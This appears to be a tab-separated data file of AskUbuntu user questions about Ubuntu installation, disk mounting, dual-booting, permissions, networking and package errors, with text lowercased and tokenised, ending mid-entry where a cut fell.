268181	ubuntu 12.04 server install fails , loops to restart	i 'm trying to install ubuntu 12.04.2 server 64bit on an intel core 2 duo pc ( 2gb ram ) . i can boot from cd or usb-stick ( tried both ) and the menu where i can choose to install ubuntu server appears . however , after i have chosen this and have pressed enter , the computer just restarts and i 'm back inside the menu ( well , that 's like in `` groundhog day '' ) . i have already installed ubuntu on a couple of pcs , but this is the first time i encounter this problem and i have n't found a solution anywhere on the web . i have checked md5-sums of the installer image . i have downloaded the image again , tried the 32bit version , tried via usb , via two different cds , checked the bios ( but nothing there that 's obviously wrong ) -- always i remain in that restart loop . this also happens when i choose any other option from the menu ( check ram etc ) . remark : i have found out that the pc has an intel board dg33fb . the existing windows xp however runs without problems . i just want to delete everything and install ubuntu server on it . ( do i have to erase the disk manually first ? ) does anybody know what to do/has somebody solved a similar problem ?
268183	mount hfs+ partion	i want to mount a hfs+ partion on an external drive . i have installed hfsprogs and created a folder to mount at /media/hfs . nevertheless this # sudo mount -t hfsplus /dev/sdb2 /media/hfs mount : wrong fs type , bad option , bad superblock on /dev/sdb2 , missing codepage or helper program , or other error fails . # dmesg | tail [ 1778.517677 ] hfs : write access to a journaled filesystem is not supported , use the force option at your own risk , mounting read-only . [ 1778.550769 ] hfs : invalid extent max_key_len 15237 [ 1778.550797 ] hfs : failed to load extents file [ 1892.776860 ] hfs : write access to a journaled filesystem is not supported , use the force option at your own risk , mounting read-only . [ 1892.777288 ] hfs : invalid extent max_key_len 15237 [ 1892.777297 ] hfs : failed to load extents file i am certain that /dev/sdb2 is correct because i checked it with gparted . any ideas ?
268190	going to network path	my computer is connected to a network . network administrator allows us to open some files , which are saved on server . in windows , i simply open run and type //192.168.2.2 and then it asks me for username and password . i enter both there and i have access to files in server . but there is some confusion here in linux . i am unable to open the said url anywhere in ubuntu . can you tell me how can i open the server files here ?
268194	mount a disk where windows is hibernated	hi there i want to access the disk where i have windows installed , but i got this error message : unable to mount 123 gb volume error mounting /dev/sda2 at /media/aimad/4e2e4f0c2e4eec91 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/aimad/4e2e4f0c2e4eec91 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/aimad/4e2e4f0c2e4eec91 i tried the command line : su mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/aimad/4e2e4f0c2e4eec91 but i got this message : su : invalid option -- 't' i do n't want to reboot my computer and the shutdown windows , i think there must be some other method where i can access to this desk even if it 's hibernated
268195	external drive not recognized	i have a 500gb external drive that i used for windows storage . later , i partitioned it and made an ubuntu partition . now , when i connect the hdd on windows , it is not able to recognize it , but ubuntu can see all the data . is there any way that i can fix it so that windows sees the windows partition at least on win xp ? thanks .
268200	how to automate ethtool ?	i tried lubuntu on my desktop beside windows xp . i really love it except for the following problem : i have a lan broadband internet connection which flawlessly works in xp , but not in lubuntu . each time i start lubuntu , i have to run sudo ethtool -s eth0 speed 10 duplex half autoneg off . then the wired connection is established . is there any method to save and automate this command so the internet connection should establish automatically when i re-start lubuntu ?
268202	how to share folders inside a dualboot ?	i have finally decided to dual-boot my windows 7 machine with ubuntu . i would like to have the same documents folder in windows and in ubuntu . so when i create new document with ubuntu and copy it in the documents folder , it would show up in documents library in windows 7 . is there any way to achieve that ? i do n't want it synchronize ( so there would be 2 copies of every single file ) but that it would be the same folder , just accessible from different os in the same machine .
268203	why i ca n't delete a folder ?	could not remove the folder [ folder name ] . show more details error removing file : directory not empty cancel-skip all-skip i tried to delete these folders from terminal with : rm -r
268217	dual-booting with windows 8 ( lots of partitions )	i 've just received my new samsung 550p5c-ad1 which comes with windows 8 and a very weird partition table . i 'd like to keep windows8 and dualboot with ubuntu ( 12.04.2 64bits ) . however i 'm little confused with all of those partitions . it is like this : scsi1 ( 0,0,0 ) ( sda ) - 1.0 tb ata st1000lm024 hn-m 1.0 mb free space # 1 523.2 mb ntfs basic data p # 2 314.6 mb b k efiboot efi system p # 3 134.2 mb microsoft re # 4 974.8 gb ntfs basic data p # 5 23.3 gb ntfs basic data p # 6 1.1 gb fat32 basic data p 728.1 kb free space how can i do ? should i resize partition 4 ( 974gb ) ? wou n't it mess up with windows ?
268218	autoexec.bat equivalents for ubuntu that run with root privelidges ?	on ubuntu there must be several `` autoexec.bat '' equivalents as i can see files like rc.local which seem to do very little because the comments in the file says it does n't work by default and i tried putting this command in there and it did n't work . what i need to know is where i place this line . echo 0 | /usr/bin/tee -a /sys/class/leds/smc : :kbd_backlight/brightness i also saw a rc.local in /etc/init.d as well but where i would place the cmd to make it work is a mystery as there are two functions in there so do i place it at the end of one of those functions or at the last line ? the command needs root permission to run and ideally it should be executed when the computer starts . as the command dims the keyboard of my macbook air . also , i would also like to know what file i 'd need to edit if only a specific user would have this command run . as its an root command and i do n't want to give admin or sudo access to that user i would like this command to execute as root when the user logs in and the user can not stop that command from running . additional discoveries $ home/.profile is the login script but does n't run as root , it works if you sudo the command but thats not want i need . the /etc/profileis weird , it does n't execute at boot but when i go into a shell and execute sudo -i '' it runs as soon as the sudo goes into interactive mode a neat short cut with version 14.04 , might have worked in earlier versions , you simply add a line to crontab using sudo crontab -e and add a line `` @ reboot whatevercommandwithfullpath '' and it works . but with this new version i created a upstart script which is closer to how it should be done .
268219	input/output error every time i use apt	whenever i try any operation with apt-get , i get an input/output error related to libcdio-paranoia1 . this has been happening for a while ad i do n't reall yknow what 's happening , but it has prevented me from installing any new packages or upgrading . for example : sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libcommons-compress-java libcommons-el-java libdb-java libdb-je-java libdb5.1-java libdb5.1-java-gcj libecj-java libequinox-osgi-java libgtkhtml3.14-19 libgtkmm-2.4-1c2a libicu4j-4.4-java libicu4j-java libjasper-java libjtidy-java liblucene2-java libservlet2.4-java libswt-cairo-gtk-3-jni libswt-glx-gtk-3-jni libswt-gnome-gtk-3-jni libswt-gtk-3-java libswt-gtk-3-jni libswt-webkit-gtk-3-jni python-wicd sat4j 0 upgraded , 0 newly installed , 24 to remove and 105 not upgraded . after this operation , 47.5 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 60 % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libcdio-paranoia1 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 )
268222	mount fat32 partition with 777 permissions	i know , this question is asked a lot of times . just searched for several hours , but nothing i did worked . the thing i want to do is setup a little nas . as a test i took a memory stick to serve as storage . the memory stick is formatted with a fat32 filesystem . because fat32 is a windows filesystem it 's not compatible with the way of changing permissions the linux way . in the several hours i searched the web i came across many different ways to change the permissions in the mounting process , but not the right one , every time the permissions are 755 for my mounted directory . my fstab looks like : /dev/something /mnt/something vfat ... 0 0 i tried many things in the option field . at first just defaults , then the write option , also tried fmask , dmask and umask options . to test if the fstab was n't the error i also tried mounting with the mount command using the fstab options . anybody knows the real solution ? just using ntfs filesystem ? use other mount options ?
268224	gnome 3 and unity not working after vlc crash	i 'm pretty much a newbie to ubuntu , and i 'm stuck right now i 'm running 12.04 on an hp with nvidia 8500gt ( 12.10 was giving me loads of problems with software center and update manager ) . small detail , i 'm using a tv as main screen ( an old one , so i 'm running 720x480 ) i tried unity for a while , but the last two months i switched to gnome3 . no problems . now , after a vlc crash . all i get is the gnome2 look , with barely video and totally no sound support . if i try to get to the login screen , , it says running in low graphics mode , and gives me 4 choices , which all run to a dead end i tried to reinstall the shells en the ubuntu desktop , but nothing seems to work has anyone conquered a similar problem lately ? help would be much appreciated
268225	where are the shortcuts listed under the places menu stored ?	how can i edit the contents of the places menu on ubuntu 12.10 ? for example , say i did n't have any videos and wanted to remove the shortcut to videos ?
268231	no response from wubi in windows 8	i have i5 2310 with dedicated mobo . i tried latest wubi software for 12.04.2 ubuntu version , but whenever i try to open wubi , it does n't do anything and i am not getting any message . so , what do i do for installing ubuntu through windows 8 ? i have assembled my pc myself and my mobo is with uifi . ubuntu was running but after i reinstalled windows 8 , then wubi stopped showing any response . i tried with latest wubi .
268233	dell inspiron 3520 , installed 12.10 ca n't get wifi to work	i have an dell inspiron 3520 that came pre-installed with windows 8 . i installed ubuntu 12.10 but was n't able to locate/install the wireless driver and had to go back to windows 8 . i 'd rather have ubuntu but i need my wifi .
268235	graphical bug : how to debug ?	i have been experiencing a strange graphical bug which i 'd like to report on launchpad . the bug occurs randomly when pressing mouse buttons in some applications , like for example when i resize tables in libreoffice writer or when i use autoscroll in firefox . when a mouse button is pressed , a black screen is displayed or sometimes the login ... the bug is transient : it disappears as soon as the mouse button is released ! i 'm basically facing 3 problems before i can report it : i do n't know how to reproduce it i do n't know which package is faulty ( hardware driver ? xorg ? unity ? , etc ) i do n't know how to show evidence of it ! a screenshot can not capture it ... this is really annoying and i would really like to report this bug so it can be solved . please help me !
268237	remove status option from gray post icon on top bar	i 'm using ubuntu 12.04 64bit , and set configuration system . on top bar is a gray post icon , and i can add for her other application : gmail notifer , fbuntu ect . but i have one problem and i ca n't found good solution . i would like remove status option from list this icon . i removed empathy and gwibber , but this status icon reappeared ( https : //wiki.ubuntu.com/messagingmenu # chat_status_section ) . does anyone know how resolve this problem ?
268239	install a software throe wine on ntfs partition	i have a question i want to install windows software , but i do not have enough space on ext4 partition , so if i install the software on ntfs directory will the software run as it would run on ext/home partition ? ? or there will be some limitations ? ?
268241	no sound after doing some steps found here on askubuntu	sound from both headphones and speakers i did the steps in the first answer there , and when i rebooted there was no sound at all . in the settings it says dummy output . what shall i do now ? ! i do not want to follow anymore steps that will make the problem even worse . sudo apt-get install aptitude sudo aptitude -- purge reinstall linux-sound-base alsa-base alsa-utils linux-image-`uname -r` linux-ubuntu-modules-`uname -r` libasound2 i ran those two commands and i got my sound back . but the problem of the headphones not muting the rear speakers still exists ! ! ! can anyone help me with that ? running ubuntu 12.04
268245	npm breaks after updating nodejs to 0.10	i am on 12.04lts . i updated my system today and in that process nodejs got updated . now my npm has stopped working . for e.g : $ npm install express npm http get https : //registry.npmjs.org/express npm http 200 https : //registry.npmjs.org/express npm http get https : //registry.npmjs.org/express/-/express-3.1.0.tgz npm http 200 https : //registry.npmjs.org/express/-/express-3.1.0.tgz npm err ! cb ( ) never called ! npm err ! not ok code 0 is anyone facing the same issue and knows a fix for this ?
268250	how to tell software updater that i do n't want certain updates	every day i go on my laptop and software updater comes up ; it wants me to install firefox and thunderbird , which i do n't want to do . i 'll uncheck those ( and the related options ) and just install all the other updates . but then , the next day , they 'll come up again . is there any way to tell software updater that i never want to do those specific updates/installs ?
268251	asus zenbook ux32vd : which kind of ubuntu installation ? cuda capable ?	i have an asus zenbook ux32vd-r3001v with win7 64bit . i think that my laptop has win7 installed in efi mode , but i am not sure . could i use `` windows installer for ubuntu desktop '' or do i need to install ubuntu in efi mode ? after the ubuntu installation , will i be able to cuda compute with ubuntu ? my laptop has two graphic card .
268253	why no internet access despite appearing to be connected to wireless network ?	i downloaded and burnt xubuntu 12.10 to a cd and installed . when installation first started it said that i was connected to the internet but at the next step it let me choose my wireless network and enter password and that seemed to work . installation succeeded and i rebooted and started xubuntu . however , although it can see the wireless networks available and appears to be connected to my wireless network , i can not get access to the internet . i 've tested using ping , ssh and firefox . ping 127.0.0.1 is the only thing that works another computer ( running osx ) using the same wireless network works fine , or if i reboot this computer and start the windows 7 ( installed on second disk ) it also has internet access . ifconfig reports : eth0 link encap : ethernet hwaddr 00:19 : db:6d:6c:52 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:356 errors:0 dropped:0 overruns:0 frame:0 tx packets:356 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:27008 ( 27.0 kb ) tx bytes:27008 ( 27.0 kb ) wlan0 link encap : ethernet hwaddr 00:23 : cd : b7:54:9a inet6 addr : fe80 : :223 : cdff : feb7:549a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:390 errors:0 dropped:0 overruns:0 frame:0 tx packets:354 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000
268255	is the key acquired from running gpg -- export-secret-key encrypted or cleartext ?	how to share one pgp key on multiple machines details how to export your gpg secret key into a file with gpg -- export-secret-key -a > secretkey.asc . what the answer does not state is whether the keyfile created is encrypted with your pass-phrase or clear-text . is the key-file encrypted or not ?
268259	i just bought an hp 4t-1000 and can not access the bios to change the boot order and install ubuntu from a usb	the f10 , f9 , and esc keys do not do anything . i called hp support ( terrible ) , and when i press the esc key during startup , it brings me to a raid reconfiguration screen and not the bios . specs : 14 '' hp 4t-1000 sleekbook 4gb ram 500gb hard drive 32gb ssd any help is appreciated . thanks .
268264	how to install tp-link ma180 on ubuntu	i just bought the 3g modem tp-link ma180 and i try to install it on ubuntu 12.10 . problem : network manager does not detect it . i saw on the web that usb-modeswith is supposed to handle it , but i do n't know how to configure it . thanks
268266	can not find class org.apache.tomcat.dbcp.dbcp.basicdatasourcefactory in tomcat7/ubuntu 12.10 ? ( possible bug )	tomcat7 : 7.0.30-0ubuntu1.1 tomcat 7 has the jar files commons-dbcp.jar and tomcat-dbcp.jar but in tomcat-dbcp.jar , it is the file org.apache.tomcat.dbcp.basicdatasourcefactory class instead of org.apache.tomcat.dbcp.dbcp.basicdatasourcefactory that is looking for . root cause javax.naming.namingexception : could not create resource factory instance [ root exception is java.lang.classnotfoundexception : org.apache.tomcat.dbcp.dbcp.basicdatasourcefactory ] org.apache.naming.factory.resourcefactory.getobjectinstance ( resourcefactory.java:121 ) javax.naming.spi.namingmanager.getobjectinstance ( namingmanager.java:321 ) org.apache.naming.namingcontext.lookup ( namingcontext.java:843 ) org.apache.naming.namingcontext.lookup ( namingcontext.java:154 ) org.apache.naming.namingcontext.lookup ( namingcontext.java:831 ) org.apache.naming.namingcontext.lookup ( namingcontext.java:168 ) org.apache.catalina.authenticator.authenticatorbase.invoke ( authenticatorbase.java:472 ) org.apache.catalina.valves.errorreportvalve.invoke ( errorreportvalve.java:99 ) org.apache.catalina.valves.accesslogvalve.invoke ( accesslogvalve.java:929 ) org.apache.catalina.connector.coyoteadapter.service ( coyoteadapter.java:407 ) org.apache.coyote.http11.abstracthttp11processor.process ( abstracthttp11processor.java:1002 ) org.apache.coyote.abstractprotocol $ abstractconnectionhandler.process ( abstractprotocol.java:585 ) org.apache.tomcat.util.net.jioendpoint $ socketprocessor.run ( jioendpoint.java:310 ) java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) java.lang.thread.run ( thread.java:722 )
268268	how to create an ubuntu app using python and qt4 designer	i recently started developing ubuntu desktop apps using quickly . but then i tried out the qt4 designer and i feel more comfortable with it than glade designer that quickly uses . i liked developing with quickly except for the part where glade comes in . so my question is , is there a possibly way of using qt4 designer to set up my gui and use python to do the coding ? also how do i do the packaging after writing the code since in quickly everything gets done in a single command 'quickly package ' and you get a .deb package file . i have done a lot of searching around but have n't found a good tutorial .
268269	how to clean up menu options in grub2 ?	i am a complete newbie when it comes to linix and ubuntu . i have finally figured out how to create a dual boot system that has windows 7 and ubuntu 12.04 on it . the windows is on a completely different sd than the ubuntu . after running boot-repair so that i can boot into both windows and ubuntu correctly , i now have several options in the grub2 menu that do not work . how do i delete these options ? also is there a way to change the names of the menu options in grub2 ? the options that i am trying to delete ( shown in the attached image ) are : 1 ) efi/efi/microsoft/boot/bkpbootmgfw.efi 2 ) efi/efi/boot/bkpbootx64.efi 3 ) windows 7 ( loader ) ( on /dev/sdc1 ) all three of these options do not work . the other two windows options both boot windows . i had trouble installing ubuntu alongside windows 7 where i wanted ubuntu to be on a separate sd . the system now works the way i want it too , i am at the stage now of just wanting to clean it up alittle bit . any information would be helpful ( if the image does n't work than please let me know , again i am a newbie at this ) . thank you , ~dan /home/daniel/pictures/2013/03/15/dscn1058.jpg
268272	ssh refusing connection with message `` no hostkey alg ''	my ssh connections worked well , but from last week ssh from my laptop to my board refusing connection . i can make a ssh connection from the board to laptop , but not vice-versa . i tried that with my user and root user and had same issue . my laptop is an ubuntu 12.10 and my board is a debian 6 . here is the verbose output of ssh : danialbehzadi @ danial-hp : ~ $ ssh -v 192.168.1.2 openssh_5.2p1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /usr/local/etc/ssh_config debug1 : connecting to 192.168.1.2 [ 192.168.1.2 ] port 22. debug1 : connection established . debug1 : identity file /home/danialbehzadi/.ssh/identity type -1 debug1 : identity file /home/danialbehzadi/.ssh/id_rsa type 1 debug1 : identity file /home/danialbehzadi/.ssh/id_dsa type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.0p1 debian-4 debug1 : match : openssh_6.0p1 debian-4 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.2 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none no hostkey alg
268273	install with existing /home ( encrypted )	i have a separate /home partition , and i 'm about to perform a reinstall ( 13.04 beta ) . i plan to set up the same user that i have now . my current home folder is encrypted . will the installer overwrite my existing files or simply create the /etc/passwd entry ? what should i know ? what do i have to do ? i have the encryption passphrase .
268276	ubuntu wo n't boot	so my configuration is such that my windows 7 is installed on a msata ssd drive and i am trying to install ubuntu on my regular sata hdd . overall the windows installer copies the files but ubuntu does n't show in the boot menu . could you tell me the solution for that ?
268277	making a metapackage that depends on a package with a different architecture	i 'm making a metapackage to install a number of packages that comprise my standard setup , like the package ubuntu-desktop . one package that i 'd like to install is [ adobe reader ] [ 1 ] , which has a deb . i 've added this deb to my custom repo ( using reprepro ) , and it installs fine by itself . however , when i attempt to install the metapackage , which depends on adobereader-enu , apt-get install metapackage says metapackage : depends : adobereader-enu but it is not installable i suspect this is because adobereader-enu is i386-only , and this is a amd64 system . the metapackage itself is basically just a control file , so it 's architecture : all . i 'm wondering if there 's a conflict here , and if so , how to fix .
268279	sudo service apache2 restart : already running	as the title says , when i run sudo service apache2 restart , the message returned says that apache is already running . however , the service is stopped ( if milliseconds later ) . if i run sudo service apache2 start , everything works fine . i assume the script is n't waiting ( long enough ) for the process to end ... i have two other servers ( they 're all 12.04 ) with the same config , exact same init file ( i did a diff ) , and they do n't exhibit this behavior . also interesting is that when i start|stop|reload , they do n't return the [ ok ] message . what gives ?
268284	why does ubuntu detect two screens when i have only one ?	which is annoying , because when i take screenshot it takes screenshot from both screens ( from an existing one and a non-existing one ) .
268285	where do certs get installed ?	i just installed a cert from my company . it was on a usb key and i double clicked the file ... inputted the password it asked for and it seems to have imported properly . now i 'm trying to configure my wifi settings so that i use that cert when connecting to my firm 's wifi network . i 'm being asked to specify the location of the cert but i do n't know where it is . i checked /etc/ssl/cert but i ca n't find it . one thing i 've noticed is that in the `` choose a certificate authority certificate '' dialog box that appears , by default , it looks like it 's looking for .der , .pem , .crt , .cer . but my cert has a .pfx extension . any help would be appreciated . thanks .
268289	why is the ubuntu partition seen as unallocated space after windows 8 upgrade ?	i have installed ubuntu 12.04 with windows 7 as dual-boot . today i decided to upgrade windows 7 to windows 8 on the other partition . i read on some forums that i would most likely need a liveusb to repair grub after upgrading windows , so i could boot into ubuntu again . after installing windows , i used the live-cd to repair boot-manager using the program `` boot-repair '' . url : http : //paste.ubuntu.com/5609860/ however i still can not get access to ubuntu and furthermore , according to gparted , the partition with ubuntu 12.04 is seen as unallocated space ( ! ) . did i do something wrong , did i somehow remove ubuntu ? since i have not done any data back up before windows upgrade , i want to access to ubuntu , without having to re-install it . could someone look at my url of boot-repair , and give me suggestions what i could do ? ps : i have used testdisk program , but it fails to recognize actual size of ubuntu partition and thus i did n't proceed .
268293	how do i get a persistent mount between boots ?	i guess i should start with what i 've got and where i am now : i added a ( true ) hardware raid 5 array to my 12.04 install ( on a separate disk ) i chose to format the 4 tb volume w/o any partitioning . ( i suspect this may be the source of my problems ) the volume ( named raid5 ) shows up in nautilus at the top of the left panel . under properties - location is - /media i used blkid to copy & paste uuid into /etc/fstab . uuid=4be9f4bd-5666-4c21-8715-5d2a866fd840 /media/raid5 ext4 0 0 i can mount from nautilus and from terminal . but , after reboot the volume is not mounted . the fstab edit seems to have had no effect . how can i remedy this ?
268299	ca n't set directory permission	i have created a special userid ( `` aa '' ) to access only one folder ( testdir ) on my pc . i created the following directory : drwx -- -- -- me me testdir i ca n't seem to change the permissions at all , not at the comand line , not using the gui . i tried : sudo chmod 0755 testdir the command executes without error but the permissions do n't change . using the gui i can select read and write for others from the drop down list but the minute i select it it changes back to `` -- '' . i am the owner of the directory - so why ca n't i change it ? i am on ubuntu 12.04 . secondary question : i linked a directory with lots of subdirs into testdir . so now i have a subdir called `` link to aaa '' . ideally i would like the new user to browse and view this link directory structure as well . this original directory structure sits on another drive , but the new user should only be able to access the directories within the folder testdir , including the linked subtree . i have not even tried yet to make that happen as i ca n't change any permissions at all . any help would be appreciated . i have a basic understanding of ubuntu , but as you can probably tell i am new to ubuntu .
268301	i have a problem with root password	i set my user account to auto login by mistake , so the key ring keeps popping up , but that 's not the real problem , my root password seems not to be my user password i ca n't install apps from the software centre , and i ca n't make my account admin again ! and when i type in the terminal `` adduser '' it says , `` adduser : only root may add a user or group to the system '' please help , i do n't know what to do..
268302	how to create a limited use lubuntu custom desktop ?	i 'm working on a project for a nonprofit cultural center . i’m trying to develop a limited desktop using lubuntu . the idea is to provide a basic desktop , maybe only four icons , chrome , openoffice , adobe reader , calculator and printing services and nothing else . as part of their service to the community , they provide computers , printing and internet access . currently in place are pcs running different versions of windows and ms office which are problematic due to licensing , access to system settings , viruses and the like . i’m trying to provide the center a machine that gives the patrons everything they need without allowing the users able to muddle with any os features and provide a machine that requires as little administration as is possible . so far , i’ve been able to comment out all menus and other desktop functionality . the machine boots to a login prompt , and the patron user i 've setup simply presses the login button and they get the mini desktop . logging off is done with ctrl-alt-backspace , it works great except that i’ve been unable to find a way to remove the “desktop preferences” from the right click mouse menu or completely disable the desktop mouse menu , either solution would work . in addition , can i disable the terminal session for this user ? any advice or different approaches to creating such a mini session would be welcome . thanks .
268306	how to disable zend server ce auto start ?	i 'm using ubuntu 12.10 , zend server ce 5.6 , for some reason i want to try xampp , but zend server ce automatically start every time i boot up my laptop , is there a way to stop it ? i do n't want to uninstall zend server ce . thanks !
268309	how to set up root account on a new install ?	i just installed ubuntu on my netbook and am loving it ! ! what iâm now trying to do is set up my root account . i tried to run the following command at a command prompt : su root and use the password for the main account i set up during the install process . but that did n't work . so then i tried '' sudo password root '' in an attempt to change the root password , but i get the following error message : cp @ cp-aoa150 : ~ $ sudo password root sudo : password : command not found any suggestions on how i can fix this ? i need to start installing tools like apache2 but i ca n't without being root ... . thanks ! !
268311	differentiating between the windows and ubuntu drive space	i am installing ubuntu for the first time . i followed the instructions online and created a usb disk for the install on my acer aspire one netbook . my netbook came with windows preloaded and i am wary of completely removing windows since this is my first time with ubuntu . i am currently in the middle of the install right now , how do i differentiate between the drive space allocated for ubuntu and the drive space allocated for windows ? the installation program has what i can only assume is the optimum drive allocation at 70/30 but i want to be sure which is which . help ?
268312	proxy problem with virtual machines	everything below relates to a ubuntu server 12.04 os . so , i created a vm at work ( which needed a proxy ) . i went and edited the /etc/environment file , and added in the proxy information . this worked fine , and i was able to connect to the network , and internet . i then made an export of that vm image to take home . i import the image on to my home computer which does n't need a proxy . i removed only the lines i added earlier in the /etc/environment file . for some reason i ca n't connect to my network . any ideas why ?
268313	can not install ubuntu 10.4 but can install 12.04 and 12.10	i have 2 lenovo thinkstation e31s with xeon processors . both machines have a 320 ssd and a 2 tb sata hd , 8 gigs ram . i am trying to install ubuntu 10.04 on them because for whatever reason , the developers i work for can not use anything past 10.04 . if i use the 10.04 amd64 dvd , the machine dies immediately after post . if i use the 10.04 amd64 alternate cd i can install but soon as i remove the cd for a reboot the machine refuses to boot , it dies after post . what is weird is that i am able to run 12.04 and 12.10 on both of these machines with no changes to the hardware configuration . is there something about ubuntu 10.04 which i am missing as far as installing on ssd ?
268314	grub rescue error ( unknown file system )	i had linux 12.10 on my hard drive and after much frustration trying to get certain windows programs to work with it , i reinstalled windows on a new hard drive ( in case i wanted to go back to linux ) . after awhile , i got an external-drive-converter-thingy and booted linux from it . it worked fine . then when i tried again without changing any settings 2 hours later , i got the grub rescue error . i have no idea why it should be any different since no settings have changed . i want to format the drive to use as an external drive , but windows does n't recognize the file system either , and wo n't let me access it . ( it 's weird . windows registers it as being plugged in - it lets me safely remove it - but it does n't register it as being a drive in my computer . i have windows xp if that helps . ) how can i access the contents of the drive/format it ?
268320	cups : hp printer dns url	the url for my printer generated by hp-makeuri looks like this : hp : /net/officejet_6500_e710n-z ? ip=192.168.178.30 but the printer is on a dhcp enabled wifi network and so its ip-address does and could change . on the other hand my wifi router seems smart enough to have some sort of dns : $ ping hp-6500a ping hp-6500a.fritz.box ( 192.168.178.30 ) 56 ( 84 ) bytes of data . 64 bytes from hp-6500a.fritz.box ( 192.168.178.30 ) : icmp_req=1 ttl=255 time=11.3 ms i tried to use the hostname in the cups url/deviceuid but it failed , any suggestions if this is possible and the correct format ?
268324	ubuntu 12.10 software center crash	i looked at many other questions but none of them helped me . it closes immediately after i open it . when i opened it it terminal i got this ... 2013-03-15 17:20:07,156 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-03-15 17:20:07,160 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-03-15 17:20:07,440 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-03-15 17:20:07,447 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-03-15 17:20:07,446 - root - error - could not find any typelib for launchpadintegration 2013-03-15 17:20:07,518 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . bus error ( core dumped )
268325	do not own my computer ?	i was trying to install some plugins for my navigational program when i noticed i ca n't do changes to the file . and after a while i noticed that i 'm not allowed to do any changes to the filesystem . the properties-permissions window for the filesystem tells me : you are not the owner , so you ca n't change these permissions . how did that happend ? how ca n't i own my computer ( only account on this laptop ) .
268329	can i set up a symbolic link-esque alias from ( e.g . ) `` mybinary dothing '' to `` dothing '' ?	i have a script that takes some gene data and runs it through dozens of programs to try to tease out as much information as possible and make me some pretty reports . however , while it seems to work under windows fine , i ca n't get it working on ubuntu 12.10 . it wants to use some software from the tigr-glimmer package , long-orfs , extract , etc . ( see below ) , and it seems like the script provided expects them to be separate binaries . when installed , however , they actually seem to be `` sub-programs '' ( ? ) of a binary tigr-glimmer , that need to be run as tigr-glimmer long-orfs , or the like . i attempted making an alias to turn long-orfs into tigr-glimmer long-orfs , but that seems to have no effect . can i somehow make a link between the two , or rather , how should i go about fixing this ? the python script is open to me , but i would rather avoid opening that can of worms . it seems to scan through the env . paths for a set of given strings ( e.g . long-orfs ... ) looking for an executable file , which apparently my alias does n't qualify as . if i change how that works , then i 'll need to change dozens of the calls strewn about several files ... i have nearly no linux experience , so my sense of how to do this is almost certainly wrong . please set me straight : p ubuntu @ domu : ~ $ python run_antismash.py -- clusterblast p115_92.gb error : failed to locate executable for 'long-orfs' error : failed to locate executable for 'extract' error : failed to locate executable for 'build-icm' error : failed to locate executable for 'glimmer3' error : not all prerequisites met ubuntu @ domu : ~ $ alias long-orfs alias long-orfs='tigr-glimmer long-orfs' ubuntu @ domu : ~ $ long-orfs starting at fri mar 15 22:08:17 2013 usage : long-orfs [ options ] < sequence-file > < output-file > read dna sequence [ ... ]
268339	why i get a message of outdated packages minutes after i have updated ?	i have getting a yellow exclamation mark in the top panel on 12.04 . it tells me i have updates that are outdated when i just updated a few minutes ago . how do you correct the updates ?
268346	is ttf-mscorefonts-installer supposed to install flash ?	sudo apt-get install unrar ttf-mscorefonts-installer reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cabextract the following new packages will be installed : cabextract ttf-mscorefonts-installer unrar 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 178 kb of archives . after this operation , 528 kb of additional disk space will be used . ... preconfiguring packages ... selecting previously unselected package cabextract . ( reading database ... 226582 files and directories currently installed . ) unpacking cabextract ( from ... /cabextract_1.4-3_amd64.deb ) ... selecting previously unselected package ttf-mscorefonts-installer . unpacking ttf-mscorefonts-installer ( from ... /ttf-mscorefonts-installer_3.4ubuntu3_all.deb ) ... selecting previously unselected package unrar . unpacking unrar ( from ... /unrar_1 % 3a4.1.4-1_amd64.deb ) ... processing triggers for man-db ... processing triggers for fontconfig ... processing triggers for update-notifier-common ... ... all done , no errors . all fonts downloaded and installed . flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.275.orig.tar.gz installing from local file /tmp/tmpvqrudq.gz flash plugin installed . setting up cabextract ( 1.4-3 ) ... setting up ttf-mscorefonts-installer ( 3.4ubuntu3 ) ... setting up unrar ( 1:4.1.4-1 ) ... update-alternatives : using 